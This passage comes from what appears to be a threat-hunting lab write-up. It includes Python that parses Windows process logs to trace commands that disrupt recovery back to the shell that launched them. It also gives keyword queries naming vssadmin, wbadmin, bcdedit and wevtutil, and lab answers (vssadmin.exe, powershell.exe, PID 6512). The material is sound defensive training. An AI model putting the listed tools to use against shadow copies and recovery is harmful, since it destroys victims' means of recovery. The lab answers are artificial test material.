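DISRUPTION_TOKENS = ["vssadmin", "wbadmin", "bcdedit", "wevtutil", "shadow", "recovery", "bootstatuspolicy"]
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def index_by_pid(events: List[Event]) -> Dict[str, List[Event]]:
    """PID -> creation events for that PID in time order (PIDs get reused)."""
    by_pid: Dict[str, List[Event]] = {}
    for ev in sorted(events, key=lambda e: e["@timestamp"]):  # ISO-8601 strings sort chronologically
        by_pid.setdefault(ev["winlog.event_data.ProcessId"], []).append(ev)
    return by_pid


def resolve_parent(by_pid: Dict[str, List[Event]], child: Event) -> Optional[Event]:
    """The parent is the latest creation event for ParentProcessId that is not after the child's
    own creation; anything later is a reuse of the same PID by another process."""
    candidates = [ev for ev in by_pid.get(child["winlog.event_data.ParentProcessId"], [])
                  if ev["@timestamp"] <= child["@timestamp"]]
    return candidates[-1] if candidates else None


def ancestry(events: List[Event], pid: str) -> List[Event]:
    """Chain from the given process up to the last ancestor visible in the log."""
    by_pid = index_by_pid(events)
    node = by_pid[pid][-1] if pid in by_pid else None
    chain: List[Event] = []
    seen = set()  # guard against malformed data that loops
    while node is not None and id(node) not in seen:
        seen.add(id(node))
        chain.append(node)
        node = resolve_parent(by_pid, node)
    return chain


def chain_summary(events: List[Event], pid: str) -> List[str]:
    return [f"{image_name(ev['winlog.event_data.Image'])}({ev['winlog.event_data.ProcessId']})"
            for ev in ancestry(events, pid)]


def find_disruption_events(events: List[Event]) -> List[Event]:
    """The room's first sweep: command lines carrying any disruption token."""
    return [ev for ev in events
            if any(tok in ev["winlog.event_data.CommandLine"].lower() for tok in DISRUPTION_TOKENS)]


def originating_shell(events: List[Event], pid: str) -> Optional[Event]:
    """Walk up from pid and return the outermost shell in the chain, i.e. the 'main shell image'
    where scripted or interactive control entered; None if no shell is in the chain."""
    shell = None
    for ev in ancestry(events, pid):
        if image_name(ev["winlog.event_data.Image"]) in SHELLS:
            shell = ev
        elif shell is not None:
            break  # first non-shell ancestor above the run of shells
    return shell


if __name__ == "__main__":
    for hit in find_disruption_events(PROCESS_EVENTS):
        pid = hit["winlog.event_data.ProcessId"]
        root = originating_shell(PROCESS_EVENTS, pid)
        print(pid, " <- ".join(chain_summary(PROCESS_EVENTS, pid)),
              "| shell:", root["winlog.event_data.ProcessId"] if root else None)
```

Where the source offers a process GUID (Sysmon's `ProcessGuid` and `ParentProcessGuid`), key the tree on it instead of on PID and time; the timestamp check above is the fallback for Security 4688 events, which carry only PIDs.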

### Conclusion

Based on the results, it can be seen that the revealed actions are targeted to disrupt the system by removing shadow copies and destroying the system recovery point/service.

This is the simplest way of hunting system data manipulation with native system tools/utilities. Still, you should investigate the query results to deepen and enrich your findings.

Suggestions on where to look and what to do next:

* Discovering the primary process that launched the subprocess to do planned adversary actions.
* Identifying the chained PowerShell and CommandShell executions.

### Q & A

1\) What is the name of the system executable used to remove shadow copies?

```
*del* or *rm* or *vssadmin* or *wbadmin* or *bcdedit* or *wevutil* or *shadow* *recovery* or *bootstatuspolicy*
```

<figure><img src="/files/SieY9idxWY5vO7q2ilGt" alt=""><figcaption></figcaption></figure>

Answer:  vssadmin.exe

2\) What is the main shell image that started the attack chain?

```
*del* or *rm* or *vssadmin* or *wbadmin* or *bcdedit* or *wevutil* or *shadow* *recovery* or *bootstatuspolicy*
```

<figure><img src="/files/98UjOoJdFOgiODEcJC5G" alt=""><figcaption></figcaption></figure>

```
winlog.event_data.ProcessId : "1972"
```

<figure><img src="/files/WpSRKXj9LUU6C5ZwwFMc" alt=""><figcaption></figcaption></figure>

Answer:  powershell.exe

3\) What is the process ID that started the attack chain?

Answer:  6512

## Conclusion

Congratulations! You have completed hunting three different MITRE ATT\&CK tactics. To conclude the room, let's summarise the hunting methodologies we discussed thoroughly.

<table><thead><tr><th width="157">Tactic</th><th>Hunting Methodology</th></tr></thead><tbody><tr><td>Collection</td><td><ul><li>Implement baselining and monitor file changes.</li><li>Monitor network traffic data spikes and anomalies.</li><li>Monitor driver installations.</li><li>Monitor process and registry activities.</li></ul></td></tr><tr><td>Exfiltration</td><td><ul><li>Monitor command executions.</li><li>Monitor file access.</li><li>Monitor network traffic data.</li></ul></td></tr><tr><td>Impact</td><td><ul><li>Monitor command executions.</li><li>Monitor file modification and deletion.</li><li>Monitor snapshot, volume, drive and image load, access and deletion.</li><li>Monitor AS API execution.</li></ul></td></tr></tbody></table>

The list below will help you create a proactive hunting ability and a more resilient attack surface.

* Learn your environment scope, components and expected activity patterns.
* Implement a continuous monitoring solution to improve visibility.
* Implement behavioural analysis and threat intelligence solutions.
* Plan and practice threat hunting, purple teaming and incident response drills.

This room covered ways to hunt suspicious activities related to actions on objectives within a compromised host. Once the threat actors and adversaries successfully compromise a host, they accomplish their actions on objectives after gaining enough resources from the previous attack steps. This room presents an interactive environment to exercise some common actions on objective procedures implemented by adversaries.
